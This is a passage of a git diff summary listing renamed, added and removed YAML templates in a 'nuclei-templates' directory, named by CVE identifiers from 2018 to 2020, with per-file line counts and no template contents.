nuclei-templates/CVE-2018/CVE-2018-14574.yaml | 36 + nuclei-templates/CVE-2018/CVE-2018-14918.yaml | 50 + nuclei-templates/CVE-2018/CVE-2018-15138.yaml | 36 - nuclei-templates/CVE-2018/CVE-2018-15473.yaml | 12 +- ...ve-2018-15517.yaml => CVE-2018-15517.yaml} | 0 ...ve-2018-15640.yaml => CVE-2018-15640.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-15657.yaml | 2 - ...ve-2018-15745.yaml => CVE-2018-15745.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-15917.yaml | 9 +- nuclei-templates/CVE-2018/CVE-2018-15961.yaml | 71 - ...ve-2018-16059.yaml => CVE-2018-16059.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16139.yaml | 19 +- nuclei-templates/CVE-2018/CVE-2018-16159.yaml | 10 +- nuclei-templates/CVE-2018/CVE-2018-16167.yaml | 13 +- ...ve-2018-16288.yaml => CVE-2018-16288.yaml} | 0 ...ve-2018-16299.yaml => CVE-2018-16299.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16670.yaml | 5 - ...ve-2018-16763.yaml => CVE-2018-16763.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16979.yaml | 22 +- nuclei-templates/CVE-2018/CVE-2018-17153.yaml | 19 +- ...ve-2018-17246.yaml => CVE-2018-17246.yaml} | 0 ...ve-2018-17254.yaml => CVE-2018-17254.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-17422.yaml | 34 - ...ve-2018-17431.yaml => CVE-2018-17431.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-18069.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-18264.yaml | 34 +- ...ve-2018-18323.yaml => CVE-2018-18323.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-18570.yaml | 8 +- nuclei-templates/CVE-2018/CVE-2018-18608.yaml | 46 - nuclei-templates/CVE-2018/CVE-2018-18778.yaml | 30 + nuclei-templates/CVE-2018/CVE-2018-18809.yaml | 10 +- nuclei-templates/CVE-2018/CVE-2018-19137.yaml | 24 +- nuclei-templates/CVE-2018/CVE-2018-19287.yaml | 26 +- nuclei-templates/CVE-2018/CVE-2018-19386.yaml | 31 + nuclei-templates/CVE-2018/CVE-2018-19439.yaml | 14 +- ...ve-2018-19458.yaml => CVE-2018-19458.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19518.yaml | 41 - nuclei-templates/CVE-2018/CVE-2018-19749.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-19751.yaml | 62 - nuclei-templates/CVE-2018/CVE-2018-19752.yaml | 31 +- ...ve-2018-19753.yaml => CVE-2018-19753.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19877.yaml | 35 + nuclei-templates/CVE-2018/CVE-2018-19892.yaml | 61 - nuclei-templates/CVE-2018/CVE-2018-19914.yaml | 46 + nuclei-templates/CVE-2018/CVE-2018-19915.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-20009.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-20010.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-20011.yaml | 47 + nuclei-templates/CVE-2018/CVE-2018-20463.yaml | 25 +- nuclei-templates/CVE-2018/CVE-2018-20470.yaml | 23 +- nuclei-templates/CVE-2018/CVE-2018-20526.yaml | 35 +- nuclei-templates/CVE-2018/CVE-2018-20608.yaml | 11 +- ...{cve-2018-2392.yaml => CVE-2018-2392.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-3810.yaml | 30 - ...{cve-2018-5316.yaml => CVE-2018-5316.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-5715.yaml | 17 +- nuclei-templates/CVE-2018/CVE-2018-6184.yaml | 10 +- nuclei-templates/CVE-2018/CVE-2018-6530.yaml | 16 +- ...{cve-2018-6910.yaml => CVE-2018-6910.yaml} | 0 ...{cve-2018-7251.yaml => CVE-2018-7251.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-7282.yaml | 8 +- nuclei-templates/CVE-2018/CVE-2018-7467.yaml | 2 +- nuclei-templates/CVE-2018/CVE-2018-7490.yaml | 18 - nuclei-templates/CVE-2018/CVE-2018-7653.yaml | 8 +- nuclei-templates/CVE-2018/CVE-2018-7700.yaml | 29 - ...{cve-2018-7719.yaml => CVE-2018-7719.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-8727.yaml | 28 - nuclei-templates/CVE-2018/CVE-2018-9118.yaml | 13 +- nuclei-templates/CVE-2018/CVE-2018-9161.yaml | 48 + ...{cve-2018-9205.yaml => CVE-2018-9205.yaml} | 0 ...{cve-2018-9995.yaml => CVE-2018-9995.yaml} | 0 .../CVE-2018/cve-2018-1000226.yaml | 34 +- .../CVE-2018/cve-2018-1000671.yaml | 33 - ...018-1000856.yaml => cve-2018-1000856.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-10230.yaml | 16 +- nuclei-templates/CVE-2018/cve-2018-10956.yaml | 27 +- ...VE-2018-11510.yaml => cve-2018-11510.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-11709.yaml | 35 + ...VE-2018-11759.yaml => cve-2018-11759.yaml} | 0 ...VE-2018-12031.yaml => cve-2018-12031.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-12300.yaml | 28 - nuclei-templates/CVE-2018/cve-2018-1247.yaml | 1 + ...VE-2018-12613.yaml => cve-2018-12613.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-12675.yaml | 34 - ...{CVE-2018-1273.yaml => cve-2018-1273.yaml} | 0 ...{CVE-2018-1335.yaml => cve-2018-1335.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-13980.yaml | 32 + nuclei-templates/CVE-2018/cve-2018-14064.yaml | 33 + nuclei-templates/CVE-2018/cve-2018-14574.yaml | 23 - nuclei-templates/CVE-2018/cve-2018-14918.yaml | 39 - nuclei-templates/CVE-2018/cve-2018-15138.yaml | 32 + nuclei-templates/CVE-2018/cve-2018-15961.yaml | 65 + nuclei-templates/CVE-2018/cve-2018-16341.yaml | 6 +- ...VE-2018-16671.yaml => cve-2018-16671.yaml} | 0 ...VE-2018-16716.yaml => cve-2018-16716.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-16761.yaml | 20 +- nuclei-templates/CVE-2018/cve-2018-16836.yaml | 18 +- nuclei-templates/CVE-2018/cve-2018-17422.yaml | 46 + nuclei-templates/CVE-2018/cve-2018-18069.yaml | 27 + nuclei-templates/CVE-2018/cve-2018-18608.yaml | 56 + ...VE-2018-18777.yaml => cve-2018-18777.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-18778.yaml | 31 - ...VE-2018-18925.yaml => cve-2018-18925.yaml} | 0 ...VE-2018-19136.yaml => cve-2018-19136.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-19365.yaml | 31 +- nuclei-templates/CVE-2018/cve-2018-19386.yaml | 28 - nuclei-templates/CVE-2018/cve-2018-19749.yaml | 61 + nuclei-templates/CVE-2018/cve-2018-19751.yaml | 69 + nuclei-templates/CVE-2018/cve-2018-19877.yaml | 43 - nuclei-templates/CVE-2018/cve-2018-19892.yaml | 69 + nuclei-templates/CVE-2018/cve-2018-19914.yaml | 54 - nuclei-templates/CVE-2018/cve-2018-19915.yaml | 61 + nuclei-templates/CVE-2018/cve-2018-20009.yaml | 59 + nuclei-templates/CVE-2018/cve-2018-20010.yaml | 60 + nuclei-templates/CVE-2018/cve-2018-20011.yaml | 54 - ...VE-2018-20985.yaml => cve-2018-20985.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-3810.yaml | 43 + ...{CVE-2018-5233.yaml => cve-2018-5233.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-7490.yaml | 32 + ...{CVE-2018-7600.yaml => cve-2018-7600.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-7602.yaml | 45 +- nuclei-templates/CVE-2018/cve-2018-7662.yaml | 30 +- nuclei-templates/CVE-2018/cve-2018-7700.yaml | 33 + ...{CVE-2018-8006.yaml => cve-2018-8006.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-8727.yaml | 30 + nuclei-templates/CVE-2018/cve-2018-9161.yaml | 34 - ...{CVE-2018-9845.yaml => cve-2018-9845.yaml} | 0 ...{cve-2019-0193.yaml => CVE-2019-0193.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-0221.yaml | 19 +- ...{cve-2019-0230.yaml => CVE-2019-0230.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-10098.yaml | 6 +- .../CVE-2019/CVE-2019-1010287.yaml | 36 - nuclei-templates/CVE-2019/CVE-2019-10405.yaml | 42 +- ...ve-2019-10475.yaml => CVE-2019-10475.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-10692.yaml | 23 +- nuclei-templates/CVE-2019/CVE-2019-10717.yaml | 43 - nuclei-templates/CVE-2019/CVE-2019-10758.yaml | 47 + nuclei-templates/CVE-2019/CVE-2019-11013.yaml | 29 - nuclei-templates/CVE-2019/CVE-2019-11043.yaml | 18 + nuclei-templates/CVE-2019/CVE-2019-12276.yaml | 68 +- ...ve-2019-12314.yaml => CVE-2019-12314.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-12581.yaml | 45 - nuclei-templates/CVE-2019/CVE-2019-12616.yaml | 45 - nuclei-templates/CVE-2019/CVE-2019-12962.yaml | 49 - nuclei-templates/CVE-2019/CVE-2019-12985.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12986.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12987.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12988.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12990.yaml | 9 +- nuclei-templates/CVE-2019/CVE-2019-13101.yaml | 68 +- nuclei-templates/CVE-2019/CVE-2019-13396.yaml | 63 + ...ve-2019-14205.yaml => CVE-2019-14205.yaml} | 0 ...ve-2019-14223.yaml => CVE-2019-14223.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14251.yaml | 31 + ...ve-2019-14322.yaml => CVE-2019-14322.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14530.yaml | 31 +- nuclei-templates/CVE-2019/CVE-2019-14750.yaml | 159 +- nuclei-templates/CVE-2019/CVE-2019-14789.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-14974.yaml | 20 - ...ve-2019-15107.yaml => CVE-2019-15107.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15501.yaml | 5 + nuclei-templates/CVE-2019/CVE-2019-15642.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-15829.yaml | 6 +- ...ve-2019-15858.yaml => CVE-2019-15858.yaml} | 0 ...ve-2019-15859.yaml => CVE-2019-15859.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15889.yaml | 15 +- nuclei-templates/CVE-2019/CVE-2019-16057.yaml | 8 +- ...ve-2019-16097.yaml => CVE-2019-16097.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16278.yaml | 56 +- ...ve-2019-16313.yaml => CVE-2019-16313.yaml} | 0 ...{cve-2019-1653.yaml => CVE-2019-1653.yaml} | 0 ...ve-2019-16662.yaml => CVE-2019-16662.yaml} | 0 ...ve-2019-16759.yaml => CVE-2019-16759.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16920.yaml | 40 +- nuclei-templates/CVE-2019/CVE-2019-16931.yaml | 2 +- nuclei-templates/CVE-2019/CVE-2019-16996.yaml | 28 +- ...ve-2019-17270.yaml => CVE-2019-17270.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-17382.yaml | 18 - nuclei-templates/CVE-2019/CVE-2019-17418.yaml | 33 +- nuclei-templates/CVE-2019/CVE-2019-17444.yaml | 39 - ...ve-2019-17506.yaml => CVE-2019-17506.yaml} | 0 ...ve-2019-17538.yaml => CVE-2019-17538.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-17574.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-17662.yaml | 11 +- nuclei-templates/CVE-2019/CVE-2019-1821.yaml | 50 - nuclei-templates/CVE-2019/CVE-2019-18371.yaml | 31 + ...ve-2019-18394.yaml => CVE-2019-18394.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-18665.yaml | 30 + nuclei-templates/CVE-2019/CVE-2019-18818.yaml | 49 - nuclei-templates/CVE-2019/CVE-2019-18957.yaml | 20 +- nuclei-templates/CVE-2019/CVE-2019-1898.yaml | 6 +- nuclei-templates/CVE-2019/CVE-2019-1943.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-20085.yaml | 18 +- ...{cve-2019-2725.yaml => CVE-2019-2725.yaml} | 0 ...{cve-2019-2729.yaml => CVE-2019-2729.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-2767.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-3398.yaml | 10 +- nuclei-templates/CVE-2019/CVE-2019-3401.yaml | 32 - nuclei-templates/CVE-2019/CVE-2019-3402.yaml | 29 + ...{cve-2019-3799.yaml => CVE-2019-3799.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-3911.yaml | 30 +- nuclei-templates/CVE-2019/CVE-2019-3912.yaml | 29 - nuclei-templates/CVE-2019/CVE-2019-3929.yaml | 13 +- ...{cve-2019-5127.yaml => CVE-2019-5127.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-5434.yaml | 10 +- ...{cve-2019-6715.yaml => CVE-2019-6715.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-6799.yaml | 10 +- nuclei-templates/CVE-2019/CVE-2019-6802.yaml | 31 +- nuclei-templates/CVE-2019/CVE-2019-7219.yaml | 33 - nuclei-templates/CVE-2019/CVE-2019-7238.yaml | 21 - nuclei-templates/CVE-2019/CVE-2019-7255.yaml | 20 +- nuclei-templates/CVE-2019/CVE-2019-7315.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-7543.yaml | 9 +- nuclei-templates/CVE-2019/CVE-2019-8086.yaml | 21 +- nuclei-templates/CVE-2019/CVE-2019-8390.yaml | 6 +- ...{cve-2019-8446.yaml => CVE-2019-8446.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-8449.yaml | 29 - ...{cve-2019-8451.yaml => CVE-2019-8451.yaml} | 0 ...{cve-2019-8903.yaml => CVE-2019-8903.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9915.yaml | 32 + nuclei-templates/CVE-2019/CVE-2019-9922.yaml | 28 + ...VE-2019-10068.yaml => cve-2019-10068.yaml} | 0 .../CVE-2019/cve-2019-1010287.yaml | 38 + nuclei-templates/CVE-2019/cve-2019-10717.yaml | 54 + nuclei-templates/CVE-2019/cve-2019-10758.yaml | 35 - nuclei-templates/CVE-2019/cve-2019-11013.yaml | 32 + nuclei-templates/CVE-2019/cve-2019-11043.yaml | 21 - nuclei-templates/CVE-2019/cve-2019-11370.yaml | 22 +- ...VE-2019-12461.yaml => cve-2019-12461.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-12581.yaml | 55 + nuclei-templates/CVE-2019/cve-2019-12583.yaml | 21 +- nuclei-templates/CVE-2019/cve-2019-12616.yaml | 39 + nuclei-templates/CVE-2019/cve-2019-12962.yaml | 56 + ...VE-2019-13392.yaml => cve-2019-13392.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-13396.yaml | 40 - nuclei-templates/CVE-2019/cve-2019-14251.yaml | 38 - ...VE-2019-14470.yaml => cve-2019-14470.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-14974.yaml | 29 + ...VE-2019-15043.yaml => cve-2019-15043.yaml} | 0 ...VE-2019-15811.yaml => cve-2019-15811.yaml} | 0 ...VE-2019-16332.yaml => cve-2019-16332.yaml} | 0 ...VE-2019-16932.yaml => cve-2019-16932.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-17382.yaml | 37 + nuclei-templates/CVE-2019/cve-2019-17444.yaml | 56 + ...VE-2019-17558.yaml => cve-2019-17558.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-1821.yaml | 51 + nuclei-templates/CVE-2019/cve-2019-18371.yaml | 35 - nuclei-templates/CVE-2019/cve-2019-18665.yaml | 37 - nuclei-templates/CVE-2019/cve-2019-18818.yaml | 52 + ...VE-2019-19134.yaml => cve-2019-19134.yaml} | 0 ...VE-2019-19781.yaml => cve-2019-19781.yaml} | 0 ...VE-2019-19908.yaml => cve-2019-19908.yaml} | 0 ...VE-2019-20141.yaml => cve-2019-20141.yaml} | 0 ...VE-2019-20210.yaml => cve-2019-20210.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-20224.yaml | 26 +- ...VE-2019-20354.yaml => cve-2019-20354.yaml} | 0 ...VE-2019-20933.yaml => cve-2019-20933.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-3401.yaml | 33 + nuclei-templates/CVE-2019/cve-2019-3402.yaml | 21 - nuclei-templates/CVE-2019/cve-2019-3912.yaml | 43 + nuclei-templates/CVE-2019/cve-2019-6340.yaml | 28 +- nuclei-templates/CVE-2019/cve-2019-7192.yaml | 92 +- nuclei-templates/CVE-2019/cve-2019-7219.yaml | 37 + nuclei-templates/CVE-2019/cve-2019-7238.yaml | 37 + ...{CVE-2019-7275.yaml => cve-2019-7275.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-8449.yaml | 30 + ...{CVE-2019-9726.yaml => cve-2019-9726.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-9915.yaml | 38 - nuclei-templates/CVE-2019/cve-2019-9922.yaml | 36 - nuclei-templates/CVE-2020/CVE-2020-10124.yaml | 3 +- nuclei-templates/CVE-2020/CVE-2020-10220.yaml | 21 - ...ve-2020-10546.yaml => CVE-2020-10546.yaml} | 0 ...ve-2020-10547.yaml => CVE-2020-10547.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-10770.yaml | 26 - nuclei-templates/CVE-2020/CVE-2020-10973.yaml | 19 +- nuclei-templates/CVE-2020/CVE-2020-11110.yaml | 12 +- nuclei-templates/CVE-2020/CVE-2020-11450.yaml | 20 +- ...ve-2020-11455.yaml => CVE-2020-11455.yaml} | 0 ...ve-2020-11546.yaml => CVE-2020-11546.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-11798.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-11854.yaml | 37 + nuclei-templates/CVE-2020/CVE-2020-11930.yaml | 35 - nuclei-templates/CVE-2020/CVE-2020-11981.yaml | 38 +- nuclei-templates/CVE-2020/CVE-2020-11991.yaml | 44 - nuclei-templates/CVE-2020/CVE-2020-12127.yaml | 19 +- nuclei-templates/CVE-2020/CVE-2020-12256.yaml | 72 +- nuclei-templates/CVE-2020/CVE-2020-12259.yaml | 30 - nuclei-templates/CVE-2020/CVE-2020-12447.yaml | 45 + nuclei-templates/CVE-2020/CVE-2020-12478.yaml | 22 +- ...ve-2020-12720.yaml => CVE-2020-12720.yaml} | 0 ...ve-2020-12800.yaml => CVE-2020-12800.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13121.yaml | 22 +- nuclei-templates/CVE-2020/CVE-2020-13258.yaml | 18 +- nuclei-templates/CVE-2020/CVE-2020-13379.yaml | 61 +- nuclei-templates/CVE-2020/CVE-2020-13405.yaml | 47 - nuclei-templates/CVE-2020/CVE-2020-13483.yaml | 36 - nuclei-templates/CVE-2020/CVE-2020-13638.yaml | 7 +- ...ve-2020-13700.yaml => CVE-2020-13700.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13820.yaml | 20 +- nuclei-templates/CVE-2020/CVE-2020-13851.yaml | 9 +- ...ve-2020-13937.yaml => CVE-2020-13937.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-14144.yaml | 10 +- ...ve-2020-14179.yaml => CVE-2020-14179.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-14408.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-14864.yaml | 2 +- ...ve-2020-15148.yaml => CVE-2020-15148.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-15505.yaml | 40 - nuclei-templates/CVE-2020/CVE-2020-15867.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-15895.yaml | 23 +- ...ve-2020-16139.yaml => CVE-2020-16139.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-16920.yaml | 59 - ...ve-2020-16952.yaml => CVE-2020-16952.yaml} | 0 ...ve-2020-17362.yaml => CVE-2020-17362.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-17456.yaml | 37 +- nuclei-templates/CVE-2020/CVE-2020-17463.yaml | 10 +- ...ve-2020-17518.yaml => CVE-2020-17518.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-17526.yaml | 32 +- nuclei-templates/CVE-2020/CVE-2020-17530.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-18268.yaml | 50 + nuclei-templates/CVE-2020/CVE-2020-19282.yaml | 33 - ...{cve-2020-1938.yaml => CVE-2020-1938.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-19515.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-1956.yaml | 27 - nuclei-templates/CVE-2020/CVE-2020-19625.yaml | 34 + nuclei-templates/CVE-2020/CVE-2020-20285.yaml | 19 +- nuclei-templates/CVE-2020/CVE-2020-20300.yaml | 23 +- ...{cve-2020-2096.yaml => CVE-2020-2096.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-20988.yaml | 43 + nuclei-templates/CVE-2020/CVE-2020-21012.yaml | 20 +- nuclei-templates/CVE-2020/CVE-2020-2103.yaml | 56 - nuclei-templates/CVE-2020/CVE-2020-2199.yaml | 23 - nuclei-templates/CVE-2020/CVE-2020-22208.yaml | 24 +- nuclei-templates/CVE-2020/CVE-2020-22210.yaml | 26 - nuclei-templates/CVE-2020/CVE-2020-22211.yaml | 4 - nuclei-templates/CVE-2020/CVE-2020-23015.yaml | 28 - nuclei-templates/CVE-2020/CVE-2020-23517.yaml | 26 - nuclei-templates/CVE-2020/CVE-2020-23697.yaml | 29 +- nuclei-templates/CVE-2020/CVE-2020-23972.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-24589.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-24701.yaml | 7 +- nuclei-templates/CVE-2020/CVE-2020-24765.yaml | 9 +- nuclei-templates/CVE-2020/CVE-2020-24902.yaml | 23 +- nuclei-templates/CVE-2020/CVE-2020-24903.yaml | 21 +- nuclei-templates/CVE-2020/CVE-2020-25506.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-26217.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-26248.yaml | 21 +- nuclei-templates/CVE-2020/CVE-2020-26258.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-26919.yaml | 9 +- nuclei-templates/CVE-2020/CVE-2020-27191.yaml | 27 +- nuclei-templates/CVE-2020/CVE-2020-2733.yaml | 21 +- ...ve-2020-27361.yaml => CVE-2020-27361.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-27481.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-28185.yaml | 39 +- ...ve-2020-28188.yaml => CVE-2020-28188.yaml} | 0 ...ve-2020-28208.yaml => CVE-2020-28208.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-28351.yaml | 31 - nuclei-templates/CVE-2020/CVE-2020-28871.yaml | 16 +- nuclei-templates/CVE-2020/CVE-2020-29284.yaml | 20 +- ...ve-2020-29395.yaml => CVE-2020-29395.yaml} | 0 ...ve-2020-29453.yaml => CVE-2020-29453.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-29583.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-29597.yaml | 25 +- ...{cve-2020-3187.yaml => CVE-2020-3187.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35338.yaml | 33 - ...ve-2020-35476.yaml => CVE-2020-35476.yaml} | 0 ...ve-2020-35580.yaml => CVE-2020-35580.yaml} | 0 ...ve-2020-35598.yaml => CVE-2020-35598.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35749.yaml | 37 - ...ve-2020-35848.yaml => CVE-2020-35848.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35984.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-35985.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-35986.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-35987.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-36287.yaml | 31 + nuclei-templates/CVE-2020/CVE-2020-36289.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-36365.yaml | 43 + nuclei-templates/CVE-2020/CVE-2020-36510.yaml | 45 +- nuclei-templates/CVE-2020/CVE-2020-3952.yaml | 5 +- nuclei-templates/CVE-2020/CVE-2020-5191.yaml | 22 +- nuclei-templates/CVE-2020/CVE-2020-5192.yaml | 25 +- nuclei-templates/CVE-2020/CVE-2020-5307.yaml | 35 - ...{cve-2020-5410.yaml => CVE-2020-5410.yaml} | 0 ...{cve-2020-5775.yaml => CVE-2020-5775.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-5776.yaml | 7 +- ...{cve-2020-5847.yaml => CVE-2020-5847.yaml} | 0 ...{cve-2020-6207.yaml => CVE-2020-6207.yaml} | 0 ...{cve-2020-6308.yaml => CVE-2020-6308.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-6950.yaml | 8 +- ...{cve-2020-7048.yaml => CVE-2020-7048.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-7107.yaml | 23 +- ...{cve-2020-7209.yaml => CVE-2020-7209.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-7247.yaml | 41 - ...{cve-2020-7796.yaml => CVE-2020-7796.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-7943.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-8091.yaml | 2 +- ...{cve-2020-8115.yaml => CVE-2020-8115.yaml} | 0 ...{cve-2020-8163.yaml => CVE-2020-8163.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8193.yaml | 22 +- ...{cve-2020-8209.yaml => CVE-2020-8209.yaml} | 0 ...{cve-2020-8497.yaml => CVE-2020-8497.yaml} | 0 ...{cve-2020-8512.yaml => CVE-2020-8512.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8515.yaml | 40 - nuclei-templates/CVE-2020/CVE-2020-8615.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-8654.yaml | 16 +- nuclei-templates/CVE-2020/CVE-2020-8771.yaml | 54 - ...{cve-2020-8813.yaml => CVE-2020-8813.yaml} | 0 ...{cve-2020-9036.yaml => CVE-2020-9036.yaml} | 0 ...{cve-2020-9054.yaml => CVE-2020-9054.yaml} | 0 ...{cve-2020-9315.yaml => CVE-2020-9315.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-9402.yaml | 23 - nuclei-templates/CVE-2020/CVE-2020-9496.yaml | 42 - nuclei-templates/CVE-2020/cve-2020-10199.yaml | 24 + nuclei-templates/CVE-2020/cve-2020-10220.yaml | 52 + nuclei-templates/CVE-2020/cve-2020-10548.yaml | 12 +- nuclei-templates/CVE-2020/cve-2020-10770.yaml | 28 + ...{CVE-2020-1147.yaml => cve-2020-1147.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-11710.yaml | 14 +- nuclei-templates/CVE-2020/cve-2020-11854.yaml | 30 - nuclei-templates/CVE-2020/cve-2020-11930.yaml | 36 + ...VE-2020-11978.yaml => cve-2020-11978.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-11991.yaml | 40 + nuclei-templates/CVE-2020/cve-2020-12259.yaml | 54 + nuclei-templates/CVE-2020/cve-2020-12447.yaml | 31 - ...VE-2020-13158.yaml => cve-2020-13158.yaml} | 0 ...VE-2020-13167.yaml => cve-2020-13167.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-13405.yaml | 57 + nuclei-templates/CVE-2020/cve-2020-13483.yaml | 42 + ...VE-2020-13927.yaml => cve-2020-13927.yaml} | 0 ...VE-2020-14181.yaml => cve-2020-14181.yaml} | 0 ...VE-2020-14883.yaml => cve-2020-14883.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-15050.yaml | 26 +- ...VE-2020-15129.yaml => cve-2020-15129.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-15227.yaml | 34 + nuclei-templates/CVE-2020/cve-2020-15505.yaml | 42 + ...VE-2020-15920.yaml => cve-2020-15920.yaml} | 0 ...VE-2020-16846.yaml => cve-2020-16846.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-18268.yaml | 38 - nuclei-templates/CVE-2020/cve-2020-19282.yaml | 38 + ...VE-2020-19283.yaml => cve-2020-19283.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-1956.yaml | 60 + nuclei-templates/CVE-2020/cve-2020-19625.yaml | 28 - nuclei-templates/CVE-2020/cve-2020-20988.yaml | 49 - nuclei-templates/CVE-2020/cve-2020-2103.yaml | 67 + ...VE-2020-22209.yaml => cve-2020-22209.yaml} | 0 ...VE-2020-22840.yaml => cve-2020-22840.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-23015.yaml | 28 + nuclei-templates/CVE-2020/cve-2020-23517.yaml | 29 + ...VE-2020-23575.yaml => cve-2020-23575.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-24223.yaml | 21 +- ...VE-2020-24312.yaml => cve-2020-24312.yaml} | 0 ...VE-2020-24550.yaml => cve-2020-24550.yaml} | 0 ...VE-2020-24571.yaml => cve-2020-24571.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-24589.yaml | 34 + ...VE-2020-25223.yaml 